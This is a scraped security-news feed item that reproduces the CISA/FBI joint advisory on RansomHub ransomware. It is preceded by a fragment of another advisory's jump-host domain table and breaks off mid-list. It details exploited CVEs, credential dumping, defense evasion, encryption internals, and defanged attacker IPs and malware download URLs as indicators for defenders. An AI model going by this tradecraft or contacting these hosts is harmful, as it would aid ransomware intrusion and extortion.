<p>Threat actors can exploit jump hosts, also known as jump servers or bastion hosts, to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in <strong>Table 28</strong> represent the tools used to establish functionality for creating a jump host.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 28: Domains Hosting Jump Host Tooling</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Domain Name</th>
</tr>
</thead>
<tbody>
<tr>
<td>interlinks[.]top</td>
</tr>
<tr>
<td>https://3proxy[.]ru</td>
</tr>
<tr>
<td>https://ngrok[.]com <a>(<strong>Note:</strong> This domain is a legitimate service leveraged for malicious purposes by Unit 29155 cyber actors and should be investigated prior to blocking.)</a></td>
</tr>
<tr>
<td>https://nssm[.]cc</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: RansomHub Ransomware]]></title>
<description><![CDATA[Summary
Note: This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techn...]]></description>
<link>https://tsecurity.de/de/2306019/it-security-nachrichten/stopransomware-ransomhub-ransomware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2306019/it-security-nachrichten/stopransomware-ransomhub-ransomware/</guid>
<pubDate>Thu, 29 Aug 2024 19:33:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><strong>Summary</strong></h2>
<p><em><strong>Note:</strong> This joint Cybersecurity Advisory is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) (hereafter referred to as the authoring organizations) are releasing this joint advisory to disseminate known RansomHub ransomware IOCs and TTPs. These have been identified through FBI threat response activities and third-party reporting as recently as August 2024. RansomHub is a ransomware-as-a-service variant—formerly known as Cyclops and Knight—that has established itself as an efficient and successful service model (recently attracting high-profile affiliates from other prominent variants such as LockBit and ALPHV).</p>
<p>Since its inception in February 2024, RansomHub has encrypted and exfiltrated data from at least 210 victims representing the water and wastewater, information technology, government services and facilities, healthcare and public health, emergency services, food and agriculture, financial services, commercial facilities, critical manufacturing, transportation, and communications critical infrastructure sectors.</p>
<p>The affiliates leverage a double-extortion model by encrypting systems and exfiltrating data to extort victims. It should be noted that data exfiltration methods are dependent on the affiliate conducting the network compromise. The ransom note dropped during encryption does not generally include an initial ransom demand or payment instructions. Instead, the note provides victims with a client ID and instructs them to contact the ransomware group via a unique <code>.onion</code> URL (reachable through the Tor browser). The ransom note typically gives victims between three and 90 days to pay the ransom (depending on the affiliate) before the ransomware group publishes their data on the RansomHub Tor data leak site.</p>
<p>The authoring organizations encourage network defenders to implement the recommendations in the <strong>Mitigations</strong> section of this cybersecurity advisory to reduce the likelihood and impact of ransomware incidents.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2024-08/aa24-242a-stopransomware-ransomhub-ransomware.pdf" class="c-file__link" target="_blank">AA24-242A #StopRansomware: RansomHub Ransomware</a>
    <span class="c-file__size">(PDF,       714.48 KB
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs, see:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2024-08/AA24-242A.stix_.xml" class="c-file__link" target="_blank">AA24-242A STIX XML</a>
    <span class="c-file__size">(XML,       133.74 KB
  )</span>
  </div>
</div>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2024-08/AA24-242A-StopRansomware-RansomHub-Ransomware.stix_.json" class="c-file__link" target="_blank">AA24-242A STIX JSON</a>
    <span class="c-file__size">(JSON,       109.41 KB
  )</span>
  </div>
</div>
<h2><strong>Technical Details</strong></h2>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v15/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 15. See the MITRE ATT&amp;CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p>
<h3>Initial Access</h3>
<p>RansomHub affiliates typically compromise internet facing systems and user endpoints by using methods such as phishing emails [<a href="https://attack.mitre.org/versions/v15/techniques/T1566/" title="Phishing">T1566</a>], exploitation of known vulnerabilities [<a href="https://attack.mitre.org/versions/v15/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>], and password spraying [<a href="https://attack.mitre.org/versions/v15/techniques/T1110/003/" title="Brute Force: Password Spraying">T1110.003</a>]. Password spraying targets accounts compromised through data breaches. Proof-of-concept exploits are obtained from sources such as ExploitDB and GitHub [<a href="https://attack.mitre.org/versions/v15/techniques/T1588/005/" title="Obtain Capabilities: Exploits">T1588.005</a>]. Exploits based on the following CVEs have been observed:</p>
<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-3519" title="CVE-2023-3519">CVE-2023-3519</a> (<a href="https://www.cvedetails.com/cwe-details/94/Improper-Control-of-Generation-of-Code-Code-Injection-.html" title="CWE-94 : Improper Control of Generation of Code ('Code Injection')">CWE-94</a>)
<ul>
<li>Citrix ADC (NetScaler) Remote Code Execution. A vulnerability exists within Citrix ADC that allows an unauthenticated attacker to trigger a stack buffer overflow of the NSPPE (NetScaler Packet Processing Engine) process by making a specially crafted HTTP GET request. Successful exploitation results in remote code execution as root.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-27997" title="CVE-2023-27997">CVE-2023-27997</a> (<a href="https://www.cvedetails.com/cwe-details/787/Out-of-bounds-Write.html" title="CWE-787 : Out-of-bounds Write">CWE-787</a> | <a href="https://www.cvedetails.com/cwe-details/122/Heap-based-Buffer-Overflow.html" title="CWE-122 : Heap-based Buffer Overflow">CWE-122</a>)
<ul>
<li>A heap-based buffer overflow vulnerability in FortiOS version 7.2.4 and below, version 7.0.11 and below, version 6.4.12 and below, version 6.0.16 and below and FortiProxy version 7.2.3 and below, version 7.0.9 and below, version 2.0.12 and below, version 1.2 all versions, version 1.1 all versions SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-46604" title="CVE-2023-46604">CVE-2023-46604</a> (<a href="https://www.cvedetails.com/cwe-details/502/Deserialization-of-Untrusted-Data.html" title="CWE-502 : Deserialization of Untrusted Data">CWE-502</a>)
<ul>
<li>The Java OpenWire protocol marshaller, such as in Apache ActiveMQ, is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to open either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Upgrading both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 fixes this issue.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-22515" title="CVE-2023-22515">CVE-2023-22515</a>
<ul>
<li>A vulnerability in publicly accessible Confluence Data Center and Server instances that allows the creation of unauthorized Confluence administrator accounts and access to Confluence instances. Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-46747" title="CVE-2023-46747">CVE-2023-46747</a> (<a href="https://www.cvedetails.com/cwe-details/306/Missing-Authentication-for-Critical-Function.html" title="CWE-306 : Missing Authentication for Critical Function">CWE-306</a> | <a href="https://www.cvedetails.com/cwe-details/288/Authentication-Bypass-Using-an-Alternate-Path-or-Channel.html" title="CWE-288 : Authentication Bypass Using an Alternate Path or Channel">CWE-288</a>)
<ul>
<li>Undisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands. <strong>Note:</strong> Software versions which have reached End of Technical Support (EoTS) are not evaluated.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2023-48788" title="CVE-2023-48788">CVE-2023-48788</a> (<a href="https://www.cvedetails.com/cwe-details/89/Improper-Neutralization-of-Special-Elements-used-in-an-SQL-C.html" title="CWE-89 : Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE-89</a>)
<ul>
<li>An improper neutralization of special elements used in an SQL command (SQL injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2 and FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets.</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2017-0144" title="CVE-2017-0144">CVE-2017-0144</a>
<ul>
<li>The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, also known as “Windows SMB Remote Code Execution Vulnerability” [<a href="https://attack.mitre.org/versions/v15/techniques/T1210/">T1210</a>].</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2020-1472" title="CVE-2020-1472">CVE-2020-1472</a>
<ul>
<li>An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller using the Netlogon Remote Protocol (MS-NRPC).</li>
</ul>
</li>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2020-0787" title="CVE-2020-0787">CVE-2020-0787</a>
<ul>
<li>This vulnerability was also potentially exploited along with the Zerologon privilege escalation vulnerability.</li>
</ul>
</li>
</ul>
<h3>Discovery</h3>
<p>RansomHub affiliates conduct network scanning with tools such as AngryIPScanner, Nmap, and PowerShell-based living off the land methods with PowerShell to conduct network scanning [<a href="https://attack.mitre.org/versions/v15/techniques/T1018/" title="Remote System Discovery">T1018</a>][<a href="https://attack.mitre.org/versions/v15/techniques/T1046/" title="Network Service Discovery">T1046</a>][<a href="https://attack.mitre.org/versions/v15/techniques/T1059/001/" title="Command and Scripting Interpreter: PowerShell">T1059.001</a>].</p>
<h3>Defense Evasion</h3>
<p>Cybersecurity researchers have observed affiliates renaming the ransomware executable with innocuous file names, such as <code>Windows.exe</code>, left on the user’s desktop (<code>C:\Users\%USERNAME%\Desktop</code>) or downloads (<code>C:\Users\%USERNAME%\Downloads</code>) [<a href="https://attack.mitre.org/versions/v15/techniques/T1036/" title="Masquerading">T1036</a>]. The affiliates have also cleared Windows and Linux system logs to inhibit any potential incident response [<a href="https://attack.mitre.org/versions/v15/techniques/T1070/" title="Indicator Removal">T1070</a>]. Affiliates used Windows Management Instrumentation [<a href="https://attack.mitre.org/versions/v15/techniques/T1047/" title="Windows Management Instrumentation">T1047</a>] to disable antivirus products. In some instances, RansomHub-specific tools were deployed to disable endpoint detection and response (EDR) tooling [<a href="https://attack.mitre.org/versions/v15/techniques/T1562/001/" title="Impair Defenses: Disable or Modify Tools">T1562.001</a>].</p>
<h3>Privilege Escalation and Lateral Movement</h3>
<p>Following initial access, RansomHub affiliates created user accounts for persistence [<a href="https://attack.mitre.org/versions/v15/techniques/T1136/" title="Create Account">T1136</a>], reenabled disabled accounts [<a href="https://attack.mitre.org/versions/v15/techniques/T1098/" title="Account Manipulation">T1098</a>], and used Mimikatz [<a href="https://attack.mitre.org/versions/v15/software/S0002/" title="Mimikatz">S0002</a>] on Windows systems to gather credentials [<a href="https://attack.mitre.org/versions/v15/techniques/T1003/" title="OS Credential Dumping">T1003</a>] and escalate privileges to SYSTEM [<a href="https://attack.mitre.org/versions/v15/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>]. Affiliates then moved laterally inside the network through methods including Remote Desktop Protocol (RDP) [<a href="https://attack.mitre.org/versions/v15/techniques/T1021/001/" title="Remote Services: Remote Desktop Protocol">T1021.001</a>], PsExec [<a href="https://attack.mitre.org/versions/v15/software/S0029/" title="PsExec">S0029</a>], Anydesk [<a href="https://attack.mitre.org/versions/v15/techniques/T1219/" title="Remote Access Software">T1219</a>], Connectwise, N-Able, Cobalt Strike [<a href="https://attack.mitre.org/versions/v15/software/S0154/" title="Cobalt Strike">S0154</a>], Metasploit, or other widely used command-and-control (C2) methods.</p>
<h3>Data Exfiltration</h3>
<p>Data exfiltration methods depend heavily on the affiliate conducting the network compromise. The ransomware binary does not normally include any mechanism for data exfiltration. Data exfiltration has been observed through the usage of tools such as PuTTY [<a href="https://attack.mitre.org/versions/v15/techniques/T1048/002/" title="Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol">T1048.002</a>], Amazon AWS S3 buckets/tools [<a href="https://attack.mitre.org/versions/v15/techniques/T1537/" title="Transfer Data to Cloud Account">T1537</a>], HTTP POST requests [<a href="https://attack.mitre.org/versions/v15/techniques/T1048/003/" title="Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol">T1048.003</a>], WinSCP, Rclone, Cobalt Strike, Metasploit, and other methods.</p>
<h3>Encryption</h3>
<p>RansomHub ransomware has typically leveraged an Elliptic Curve Encryption algorithm called Curve 25519 to encrypt user accessible files on the system [<a href="https://attack.mitre.org/versions/v15/techniques/T1486/" title="Data Encrypted for Impact">T1486</a>]. Curve 25519 uses a public/private key that is unique to each victim organization. To successfully encrypt files that are currently in use, the ransomware binary will typically attempt to stop the following processes:</p>
<ul>
<li><em>"vmms.exe"</em></li>
<li><em>"msaccess.exe"</em></li>
<li><em>"mspub.exe"</em></li>
<li><em>"svchost.exe"</em></li>
<li><em>"vmcompute.exe"</em></li>
<li><em>"notepad.exe"</em></li>
<li><em>"ocautoupds.exe"</em></li>
<li><em>"ocomm.exe"</em></li>
<li><em>"ocssd.exe"</em></li>
<li><em>"oracle.exe"</em></li>
<li><em>"onenote.exe"</em></li>
<li><em>"outlook.exe"</em></li>
<li><em>"powerpnt.exe"</em></li>
<li><em>"explorer.exe"</em></li>
<li><em>"sql.exe"</em></li>
<li><em>"steam.exe"</em></li>
<li><em>"synctime.exe"</em></li>
<li><em>"vmwp.exe"</em></li>
<li><em>"thebat.exe"</em></li>
<li><em>"thunderbird.exe"</em></li>
<li><em>"visio.exe"</em></li>
<li><em>"winword.exe"</em></li>
<li><em>"wordpad.exe"</em></li>
<li><em>"xfssvccon.exe"</em></li>
<li><em>"TeamViewer.exe"</em></li>
<li><em>"agntsvc.exe"</em></li>
<li><em>"dbsnmp.exe"</em></li>
<li><em>"dbeng50.exe"</em></li>
<li><em>"encsvc.exe"</em></li>
</ul>
<p>The ransomware binary will attempt to encrypt any files that the user has access to, including user files and networked shares.</p>
<p>RansomHub implements intermittent encryption, encrypting files in 0x100000 byte chunks and skipping every 0x200000 bytes of data in between encrypted chunks. Files smaller than 0x100000 bytes in size are completely encrypted. Files are appended with 58 (0x3A) bytes of data at the end. This data contains a value which is likely part of an encryption/decryption key. The structure of the appended 0x3A bytes is listed below with images from three different encrypted files.</p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-08/Figure%201%20-%20The%20first%20eight%20bytes.png?itok=7KCmOV_-" width="496" height="116" alt="Figure 1 - The first eight bytes">



</div>
      <figcaption class="c-figure__caption"><em>Figure 1: The first eight bytes are the size of the encrypted file.</em></figcaption>
  </figure>
<p>The next eight bytes are the size of encrypted blocks. If the entire file is encrypted, this section is all zeros. In this example, each encrypted section is 0x100000 bytes long, with 0x100000 bytes between each encrypted block. This number was observed changing based on the size of the encrypted file.</p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-08/Figure%202%20-%20The%20size%20of%20encrypted%20blocks.png?itok=59AF45Sy" width="496" height="85" alt="Figure 2 - The size of encrypted blocks">



</div>
      <figcaption class="c-figure__caption"><em>Figure 2: The size of encrypted blocks.</em></figcaption>
  </figure>
<p>The next two bytes were always seen to be 0x0001.</p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-08/Figure%203%20-%20The%20next%20two%20bytes.png?itok=M7DpLyKf" width="494" height="100" alt="Figure 3 - The next two bytes">



</div>
      <figcaption class="c-figure__caption"><em>Figure 3: The next two bytes are always 0x0001.</em></figcaption>
  </figure>
<p>The next 32 bytes are the public encryption key for the file.</p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-08/Figure%204%20-%20Public%20encryption%20key.png?itok=V09lNet1" width="493" height="94" alt="Figure 4 - Public encryption key">



</div>
      <figcaption class="c-figure__caption"><em>Figure 4: Public encryption key for the file.</em></figcaption>
  </figure>
<p>The next four bytes are a checksum value.</p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-08/Figure%205%20-%20Checksum%20value.png?itok=27hZrM7n" width="498" height="83" alt="Figure 5 - Checksum value">



</div>
      <figcaption class="c-figure__caption"><em>Figure 5: Checksum value.</em></figcaption>
  </figure>
<p>The last four bytes are always seen to be the sequence 0x00ABCDEF.</p>



<figure class="c-figure c-figure--image" role="group">
  
  <div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2024-08/Figure%206%20-%20The%20last%20four%20bytes.png?itok=cT5kmoKF" width="495" height="82" alt="Figure 6 - The last four bytes">



</div>
      <figcaption class="c-figure__caption"><em>Figure 6: The last four bytes.</em></figcaption>
  </figure>
<p>The ransomware executable does not typically encrypt executable files. A random file extension is added to file names and a ransom note generally titled <code>How To Restore Your Files.txt</code> is left on the compromised system. To further inhibit system recovery, the ransomware executable typically leverages the <code>vssadmin.exe</code> program to delete volume shadow copies [<a href="https://attack.mitre.org/versions/v15/techniques/T1490/" title="Inhibit System Recovery">T1490</a>].</p>
<h3>Leveraged Tools</h3>
<p>See <strong>Table 1</strong> for publicly available tools and applications used by RansomHub affiliates. This includes legitimate tools repurposed for their operations.</p>
<p><strong>Disclaimer:</strong> Use of these tools and applications should not be attributed as malicious without analytical evidence to support threat actor use and/or control.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 1: Tools Used by RansomHub Affiliates</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Tool Name</strong></th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>BITSAdmin</td>
<td>A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers.</td>
</tr>
<tr>
<td>Cobalt Strike [<a href="https://attack.mitre.org/versions/v15/software/S0154/" title="Cobalt Strike">S0154</a>]</td>
<td>A penetration testing tool used by security professionals to test the security of networks and systems. RansomHub affiliates have used it to assist with lateral movement and file execution.</td>
</tr>
<tr>
<td>Mimikatz [<a href="https://attack.mitre.org/versions/v15/software/S0002/" title="Mimikatz">S0002</a>]</td>
<td>A tool that allows users to view and save authentication credentials such as Kerberos tickets. RansomHub affiliates have used it to aid privilege escalation.</td>
</tr>
<tr>
<td>PSExec [<a href="https://attack.mitre.org/versions/v15/software/S0029/" title="PSExec">S0029</a>]</td>
<td>A tool designed to run programs and execute commands on remote systems.</td>
</tr>
<tr>
<td>PowerShell</td>
<td>Cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.</td>
</tr>
<tr>
<td>RClone</td>
<td>A command line program used to sync files with cloud storage services.</td>
</tr>
<tr>
<td>Sliver</td>
<td>A penetration testing toolset which allows for remote command and control of systems.</td>
</tr>
<tr>
<td>SMBExec</td>
<td>A tool designed to manipulate SMB services for remote code execution.</td>
</tr>
<tr>
<td>WinSCP</td>
<td>Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Affiliates have used it to transfer data from a compromised network to actor-controlled accounts.</td>
</tr>
<tr>
<td>CrackMapExec</td>
<td>Pentest Toolset</td>
</tr>
<tr>
<td>Kerberoast</td>
<td>Kerberos Brute force and Exploitation Tool</td>
</tr>
<tr>
<td>AngryIPScanner</td>
<td>Network Scanner</td>
</tr>
</tbody>
</table>
<h2><strong>Indicators of Compromise</strong></h2>
<p><strong>Disclaimer:</strong> Several of these IP addresses were first observed as early as 2020, although most date from 2022 or 2023 and have been historically linked to QakBot. The authoring organizations recommend organizations investigate or vet these IP addresses prior to taking action (such as blocking).</p>
<p>See <strong>Table 2–Table 5</strong> for IOCs obtained from FBI investigations.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 2: Directory Structure TTPs</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Filename</th>
<th role="columnheader"><strong>Description</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\crackmapexec.exe</td>
<td>CrackMapExec</td>
</tr>
<tr>
<td>C:\Users\%USERNAME%\AppData\Local\Programs\Python\Python311\Scripts\kerbrute.exe</td>
<td>Kerberoasting</td>
</tr>
<tr>
<td>C:\Users\%USERNAME%\Downloads\Anydesk.exe</td>
<td>Anydesk C2</td>
</tr>
<tr>
<td>C:\Users\%USERNAME%\Desktop\IamBatMan.exe</td>
<td>Ransomware</td>
</tr>
<tr>
<td>C:\Users\backupexec\Desktop\stealer_cli_v2.exe</td>
<td>Info Stealer</td>
</tr>
<tr>
<td>C:\Users\%USERNAME%\Downloads\nmap-7.94-setup.exe</td>
<td>Nmap</td>
</tr>
<tr>
<td>C:\Program Files (x86)\Nmap\nmap.exe</td>
<td>Nmap</td>
</tr>
<tr>
<td>C:\Users\%USERNAME%\Downloads\mimikatz_trunk\x64\mimikatz.exe</td>
<td><a>Mimikatz</a></td>
</tr>
<tr>
<td>C:\Users\backupexec\Downloads\x64\mimikatz.exe</td>
<td>Mimikatz</td>
</tr>
</tbody>
</table>
<p><strong>Disclaimer</strong>: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking. Many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.</p>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3: Known IPs Related to Malicious Activity (2023-2024)</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">IP Address</th>
</tr>
</thead>
<tbody>
<tr>
<td><a>8.211.2[.]97</a></td>
</tr>
<tr>
<td>45.95.67[.]41</td>
</tr>
<tr>
<td>45.134.140[.]69</td>
</tr>
<tr>
<td>45.135.232[.]2</td>
</tr>
<tr>
<td>89.23.96[.]203</td>
</tr>
<tr>
<td>188.34.188[.]7</td>
</tr>
<tr>
<td>193.106.175[.]107</td>
</tr>
<tr>
<td>193.124.125[.]78</td>
</tr>
<tr>
<td>193.233.254[.]21</td>
</tr>
</tbody>
</table>
<div>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 4: Known URLs Related to Malicious Activity (2023-2024)</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Web Requests</th>
</tr>
</thead>
<tbody>
<tr>
<td><a>http[:]//188.34.188[.]7/555</a></td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/</td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/amba16.ico</td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/bcrypt.dll</td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/CRYPTSP.dll</td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/en</td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/en-US</td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe</td>
</tr>
<tr>
<td>http[:]//188.34.188[.]7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.exe.Config</td>
</tr>
<tr>
<td>http[:]//188.34.188[].7/555/NEWOFFICIALPROGRAMCAUSEOFNEWUPDATE.INI</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/1.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/1.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/10.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/12.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/12.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/2.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/2.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/2wrRR6sW6XJtsXyPzuhWhDG7qwN4es.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/3.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/3.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/4.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/4.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/5.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/5.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/6.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/7.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/8.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/9.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/92.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/AmbaPDF.ico</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/ambapdf.ico.DLL</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/bcrypt.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/Cabinet.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/CRYPTBASE.DLL</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/cryptnet.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/CRYPTSP.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/cv4TCGxUjvS.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/DPAPI.DLL</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en-US</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/en-US/d%E5%AD%97%E5%AD%97.resources/d%E5%AD%97%E5%AD%97.resources.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/iertutil.dll</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/information.exe</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/information.exe.Config</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/information.INI</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/IPHLPAPI.DLL</td>
</tr>
<tr>
<td>http[:]//89.23.96[.]203/333/mshtml.dll</td>
</tr>
<tr>
